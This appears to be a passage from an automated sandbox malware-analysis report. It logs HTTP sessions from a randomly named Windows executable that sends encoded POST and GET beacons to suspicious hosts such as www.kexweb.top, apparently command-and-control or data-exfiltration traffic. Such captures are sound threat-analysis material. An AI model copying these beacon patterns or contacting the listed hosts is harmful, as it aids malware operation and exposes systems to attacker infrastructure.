                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 59 6a 2f 35 42 2b 57 50 70 59 72 42 36 46 78 56 6e 4d 4a 6b 79 53 6a 2f 68 50 50 2b 68 75 66 4d 6e 70 32 57 65 64 63 77 6d 6b 6b 55 56 61 6d 38 73 4c 70 58 59 41 55 5a 44 6a 56 31 4d 37 6c 75 45 55 39 74 77 6f 64 61 4a 63 72 78 63 72 53 39 4b 79 53 55 41 48 53 46 6f 4a 39 64 69 6c 4f 62 65 4a 30 57 70 68 38 6f 44 43 44 61 4f 37 5a 52 2f 33 64 76 4b 6d 51 6d 54 37 71 71 51 69 54 67 34 4c 38 4c 5a 6a 74 37 55 4b 51 58 5a 45 71 6d 36 4a 71 70 7a 51 51 37 6a 38 77 74 6f 38 4b [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2KR1aSX0xXpKDuG5sQXZ1NxjONMiloTdGy3W+IwLFVsZTPn2IB73zTKuVGbOPPdvuKKg+rBGBZm1slVFNXlqQai4Yj/5B+WPpYrB6FxVnMJkySj/hPP+hufMnp2WedcwmkkUVam8sLpXYAUZDjV1M7luEU9twodaJcrxcrS9KySUAHSFoJ9dilObeJ0Wph8oDCDaO7ZR/3dvKmQmT7qqQiTg4L8LZjt7UKQXZEqm6JqpzQQ7j8wto8K+MSqzh/lygzhKTtfMJ65QFl2r1tk+8keesun/LXud3fRomXeu/lcZ6vJZ4Gpqg8wqZnvzB2RFoOjBo0Y0dPSlxW2B/U7tq4OtqKDeWiqmAfumXz0mNnVPpEr/59voHNxV0NJEpJbBua23SS8CMAsC3nobdyysTPY/e9JmXkaoJvthsVpb5e0eEiTkQSxA6Reo38wln5wckjMFjsNpOO54YJ5X3kGemFk2m2482792vN4VnRTm6UIxKCqUoe0D6Lm25dYwnzujSmuTwz7TEp1z+nOW4WSjQeRQooVHwErlU/O0OyFxUMT1LZYUhmlZ42gxY5MR0ulhTbr9LLSCTrSWWvzaAkihpCrrxuS+bJPmy1RUEAYAz4KLOsPNbdGT7kCb9LjIN2YYhg833glyAwPrRXlSvRk8+zH2R6o1htK3AjRHKJ4DI2SB3tqJXCCUFoYdpMFoJdvYQxaAaQeKNJ4UkFnUrZ4lKjzQI3Ati8xNR/hTFMUynxsc/Jvm8M+JoVK6OOyvGmosHQ56Hp8PwV7enO3bsisCxpVpd67KoFSCSpaWPuBl8odzIJ/u0/50BCvUX7X/S8vdD1pHo21KQvES/5tX4qmWtofAiWab+jvKjbRZZQ4x9oyeTEYRF/VPN5FNY3m3EGkpIXGfxxUhJVzZRuL5PlmKadDwR [TRUNCATED]
                                                        Sep 18, 2024 16:19:08.345907927 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:19:08 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.553630217.70.184.50801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:10.276715040 CEST566OUTGET /nxfn/?2VDlJ=Z2VdhTx&x0wHoJ8X=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVS2aVeWkTweCwbKJYJa5ZpRDYExluaviz3hCAwKYGhMeZlQ== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.languagemodel.pro
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:19:11.054832935 CEST1236INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:19:10 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Language
                                                        Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                                        Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                                        Sep 18, 2024 16:19:11.054877996 CEST909INData Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
                                                        Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=
                                                        Sep 18, 2024 16:19:11.054887056 CEST5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.55363163.250.47.40801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:16.778733969 CEST810OUTPOST /3bdq/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.kexweb.top
                                                        Origin: http://www.kexweb.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.kexweb.top/3bdq/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 54 55 33 37 35 6e 49 32 4b 6d 48 63 73 42 61 48 41 4e 50 6d 5a 37 68 79 72 43 4c 45 37 63 72 30 32 63 62 55 48 6f 3d
                                                        Data Ascii: x0wHoJ8X=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqTU375nI2KmHcsBaHANPmZ7hyrCLE7cr02cbUHo=
                                                        Sep 18, 2024 16:19:17.368331909 CEST595INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:17 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 389
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.55363263.250.47.40801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:19.324834108 CEST830OUTPOST /3bdq/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.kexweb.top
                                                        Origin: http://www.kexweb.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.kexweb.top/3bdq/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 58 5a 69 34 4b 38 56 4c 39 43 75 56 4d 72 4b 51 39 75 6e 34 43 38 74 75 48 4c 6b 62 34 65 34 77 32 43 35 63 70 55
                                                        Data Ascii: x0wHoJ8X=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15XZi4K8VL9CuVMrKQ9un4C8tuHLkb4e4w2C5cpU
                                                        Sep 18, 2024 16:19:19.914203882 CEST595INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:19 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 389
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.55363363.250.47.40801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:21.869117975 CEST1847OUTPOST /3bdq/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.kexweb.top
                                                        Origin: http://www.kexweb.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.kexweb.top/3bdq/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 79 52 66 4f 68 70 59 57 5a 4b 6e 49 62 38 67 36 32 65 41 2f 42 64 77 32 41 6d 41 78 70 76 76 4a 36 73 73 35 2f 48 73 34 74 48 73 33 71 59 30 61 35 56 51 35 44 31 73 33 4b 4d 58 64 75 52 78 38 2b 58 6b 56 4b 2b 32 38 5a 73 46 63 2b 34 34 2f 44 5a 31 67 33 65 69 78 43 4b 43 68 78 72 33 67 78 2f 65 62 35 66 37 6f 45 59 50 71 51 4e 4e 52 42 77 4d 36 4c 58 72 50 74 61 61 47 64 47 6e 4d 2f 51 34 63 5a 72 4d 6c 55 59 67 58 57 34 62 66 76 67 2f 47 4e 2f 59 78 62 58 31 6b 45 4d 74 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267PibyRfOhpYWZKnIb8g62eA/Bdw2AmAxpvvJ6ss5/Hs4tHs3qY0a5VQ5D1s3KMXduRx8+XkVK+28ZsFc+44/DZ1g3eixCKChxr3gx/eb5f7oEYPqQNNRBwM6LXrPtaaGdGnM/Q4cZrMlUYgXW4bfvg/GN/YxbX1kEMty01qsxIDS+OKENMZ97xavDtYkjIqIn96241FYVqGPNNO+dt9/1CVkKpiIwi3onLyuHbMrdseCLzyyZk0f9ZduVJGqA7PoGudUVYEbsur3AlPgpcawCQsQTC5WpOeyqFwAtnzXbLJzHsRRD1+xv2xTEzjldXW+tWPB73sbZtGyil8gM0Vp7xPxOUqXM+ar2CQ2KNeitG98hq4l00+3qjLcaIg7mCGmj6MvKji8hncc+Q2R4fQfjScL3LZ8FiOQqOijZSf4YNxCtW/lGJcljYqFJp5cz+PG4ysAyqeWQQsAoKpYHefEpUBNS2pg3lxI6kX/Ll+ivw+O0eHGlV1Jv/lkevRZorVTqh7e9wVxlyuMv3k078fUpF/AvYqFsCqot7bIvRbPqktok73ZxujRET1ciGTHGZtJuzYm9m5GVtt2QHPASP1V0k4WKK60ZdR5im1mVWd8zwH50rp0+ybYrQt/eMqLRvfC5xBmCAnItqcc3ooeaeQAq+JC0coc+EoZUeTj3ve8N6cgfduljDRCBlpyzuROt1LU6UI8p2+kxCS4UrDUtU8ceh9yJP8QZhe8zHFgkvcTyvfXDCreKaTd2zSBS9p2RpGCjTKUudIaHAVegVObQY+k4k+yWcES23buPfu+3TQhwOxZ4cvLBR51TMk/629vjQBmZb5/Q [TRUNCATED]
                                                        Sep 18, 2024 16:19:22.515882015 CEST595INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:22 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 389
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.55363463.250.47.40801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:24.414429903 CEST559OUTGET /3bdq/?x0wHoJ8X=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4ExiUknvodE5HLMgr3NywByQXC4D0E63F2IS7XJBOJFBCzN3g==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.kexweb.top
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:19:25.013453007 CEST610INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:24 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 389
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
